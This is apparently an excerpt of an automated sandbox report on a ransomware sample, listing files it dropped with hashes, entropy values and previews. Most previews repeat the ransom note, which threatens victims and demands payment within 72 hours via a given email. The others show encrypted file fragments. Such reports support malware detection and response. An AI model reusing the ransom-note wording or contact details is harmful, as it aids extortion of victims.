                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.270246607056879
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:2YeN9gti1YDul5ZV77L6UNGHqsuYN5BWQXk0kqLKw5rn1SCBQkUUHn:PeMi1eqh77OUjhG3RkqLKw6CBFVHn
                                                                                            MD5:AB9C7139F977B6A545803B125A1A4C9F
                                                                                            SHA1:6FECE657DF5E4D03B73BAB5BDEFCE95E63D2142A
                                                                                            SHA-256:2049EA7C6BBF6A741A4E01D77AC6A2472F311C69020BBF313F0CE66DD3284E38
                                                                                            SHA-512:6F30CB66E4E401DA8EF93352D00FBEB81B414C73AB6B609008189960E3FD74572F5EF1089900695D96A513D8CFEB303F1400C54148470477E541E42F74184311
                                                                                            Malicious:false
                                                                                            Preview:.ow{.:..dg..P.m...........rp..s..r4..BOQ7t.7...Qn.P.....{.wP....2..HRq...W...='Q.v....b..t.#.c%.K...|..."a...U.o..*....5w`."I1..#-..[#'.2O.p..,..Ut....O..T~H..*"z.7...8. ...i...s..'b...k...v..dr.F.$....p....p."A.?.........-..Yp.....u.....gW4.q.q.D.>q.T.....).L.Iz`..10xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):290
                                                                                            Entropy (8bit):7.217816031642408
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:PEiFC9yrQ4b6hYz71vLmv0FFj0fgO3meVN8gzge1lFaE3uHn:+Za9LYSj0fg+3zgeIHn
                                                                                            MD5:16CA441560B52D0FDDC6E8E5A52C7007
                                                                                            SHA1:0201B0B67DCA74BDDA5BB8F765C3A6B878231E9B
                                                                                            SHA-256:7257FC1BB24CAAEB1471A672AE80434A94E5A21938545E27FEF165C178FAB92A
                                                                                            SHA-512:C94A4F1BCA3F7A59A691A1A4A7D8E6C34ED31299B1F3163BF87085E0FD44E1FBA0077A96E88D8374D4065596C7ACFD905F38930F4ED77EE88D4EA6AD3624E1DF
                                                                                            Malicious:false
                                                                                            Preview:..2.$.P..e>^..w...@.....B...B......!....q...I..>.+tL.K...^._U][Z..Ssx..y.....L..+.k.....|..."s...C.6.... =O..dn.t...........W..IP.z.C.T...S...=......z.....(.3A..K)...e.......:..uW......B?..."..|..`.....8...54....x..7..R|.fq.y8.o.....(...7.]..Z&.}.|.=n....Qu.O0...}..T0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):734
                                                                                            Entropy (8bit):7.739379495677743
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:oSLXXJAtDGvpntbQWAxB2NT6j5iLs0K37jVHhT0WVdthge+sSwKEI/ftwn:oSLXmDGvJ2WwdFiaVH+WTRr1YXu
                                                                                            MD5:2645A6B29801CE17F350A398A1B8EC91
                                                                                            SHA1:D44E82721BD864DA2D7B5F423D83E13717D43C47
                                                                                            SHA-256:A97D447B92A0F2D638A8F959E94F3788B1023BBA1E32FEFD99FBE82458280683
                                                                                            SHA-512:D26B8D7C6516EF305310399D7CD875939691AC0C24004E88B7CCA40225D4E4CAB908E6DDEC316F0E07EDA0FDCA065BC232EAB723E3DC2A60CC0C29CAD8BA9D96
                                                                                            Malicious:false
                                                                                            Preview:]..W$*..&.....H..*E..!.IO.Vs.;.8..m.hc.w.....!.&..V.V.hM....E2-.y.......wc6%.f.c..Hv%H=xN..).4.B[...2..5-..T..n.w5.6..X.-. n.H..`..W.3R.:+..d.Y.c..4.J...WZ.NIf..kM.^..s=.)/....8*^.~...1X5L.....).J.o....P.......y..iif..p~..r..a.a......z..$.q..0.K..m..^.....t.MM.4...m.P..K<k.g1.....>....\......M.'.{...."..:.@6..E.b^...|..#...b..,.Rw......R......(F...MZ.`.l.s..90{;.M.(>.......f._._....*ZV.....t....<........N..e~...Qv.)..UW...gHc."{...p...bT..@.[I...~../....l.u...K].".....-kNd...y....&p..K..z@.....:.......A.p$.Z......5T.......6..D..5......7RA.Tb.j..S.h.. t.._.y.l=..A..j.PQ.1*.!-N..Q.h.f3.P<sJ).c...hr. ......2.p(....VC..X..p....[..-)....r.L[n..wY|N...r....D.-9..X......l$...1u.".E~.1*..0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):734
                                                                                            Entropy (8bit):7.750652631405878
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:WC2HuizxjSVaI43TcgNC5LOVWsxzKqDG1TXHw/OLQCN9LeiWg9SWpByg6cH25+n:WCc5SUI4lNVxtQTHwCQCjuWpBygPq+
                                                                                            MD5:44B481C3177C41B76F51A6B83F0019F8
                                                                                            SHA1:37DCFC42EB94F86E8B528DEB14FE024C296B2443
                                                                                            SHA-256:9ECA8050AE2C29AB596848202BABBFAC66BBE5753F431FF9C5D0059C4FC24498
                                                                                            SHA-512:CBCC82E6DC94822E85B125C42B210EE96F8B4D2E038FB322872DD749EBBD9970309B71FCD786834F1058A10D728C968AD57C8D418710BFB1173E4A9A19BFB8BD
                                                                                            Malicious:false
                                                                                            Preview:....n..u_.o..b.,r.vF.m=|.;o....R....+....q../....'.....R..0.`1....^.ZX.w..8.O.Q.;....=....K..v........./..<i....A.1"C......u.Cq..@.d..z.Tf...].l.Z.o.d/.a..X.j....Zj.v.H...pgR..L.K_.GSP@..|./M..1.1j.........y.Qv...@.e...+hv.]o*.$.YK.Td.KC...7~Ya4p}....s?K....3..o1-"P...W.bq.T.Az.?.{..>dmC.pk0.T.......+.N6-.5.+x4]>_+..E.tV.L.........:.K..WC...l.YE...[. ..x)9.(_.h...I#m....5.,...EW.......Ih[i[.X....uh.:B.l......g.u.."l.N.K.4.k|`.x.~.;..p.#.#4.\...@..o.H.....q c..h.7..,N..zq.%.]..,..M.....!..4..s.....FQ.i.H...B*.E.`.2.!FRh.'j.s.#t..%r..g..^...x@-.<.....?...4..o...`JmXc.4.../R....>D.v..>j..:..".6\,..\P...7`n..Hr.....1.f.P,.k..n.FZ*.....$a...VTY.G.[.!m..{.....Y\...R...G..x.OBA.}...pt'kF.,&5.#n0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):290
                                                                                            Entropy (8bit):7.266780621091441
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TzLqV8oOJVLxv2MAl3oh0YzntYyRAIoQn+ea4Byp5zQ0n:OV8TLxuMm3oe2ntYy4Qn+ea4BwBn
                                                                                            MD5:4494C246B67F2F36BE7AA50611ADCB7A
                                                                                            SHA1:AD9B2ACF9CDC8AC6647DF25CCB8C182F0124F1F8
                                                                                            SHA-256:1910B373D089F04FB9008F27395FB7AADF0DDAC7B344C11179E8CDB7794351D1
                                                                                            SHA-512:003CB06A075E57C6CE2D04AB88215CE76768C62AB91A9AB5EA392F1BA96C2DA9A92C18CFA1831D134120319167B03D7D055C1DBA671FB5E43DFCE2A6D30F3EC0
                                                                                            Malicious:false
                                                                                            Preview:.ZZ..s.r..... .-.....g.v-..X...c.\y.v..0+.PzQF......>....4#... %...lP6K.....D.....|........3)V.J..r...2..W....=;Z.&....k.qk+.?...`.Z..~{:3.7R.#.%&.#[..5.....@...=....Y........*.....f.$.(.m_......b#.{.c.K............<.../.......Q..#....[.'.n.7*}...Wy;.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.105585839942915
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:UkW2DgtflA1OdhWhVaiAngjGCYvO8l9hreMR44i+Zh6HXy0FhzP2n:UkupuOd6aiAg6C/OhSMR4os9LzP2n
                                                                                            MD5:9625DAA630FF3CA10A235C73D798DB19
                                                                                            SHA1:D7840CE31871567B2F21F7219230F27171B2205D
                                                                                            SHA-256:D04002F5CD88214FBEA2FF3D753EE382B1365C5A2B0402C2D7E0E5B6C0B0E1F7
                                                                                            SHA-512:7243EF43E5F324893B5775344BF667C6271C6AE1CAB8B10B6B7479BC1655EE0263078EFBA474E5AFD4D0F48A3AAB0F1C45A5CAFC77DF88AE5567E4B085100862
                                                                                            Malicious:false
                                                                                            Preview:A8..r.h.....K9.B...........qbx.....gbg...r-.....Dm.B..gV..A....PA:-z}.../.D..8.G...!n?V...... ...N....(wK.(h...a...*j....&....^..............u.....k...:.D0............Ej+... ...[.QB..`.0%....9.!....~.Et..F....s6:.r.M.......Mv..b.....&fZ.k..&.a.}...p\.j........h .0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
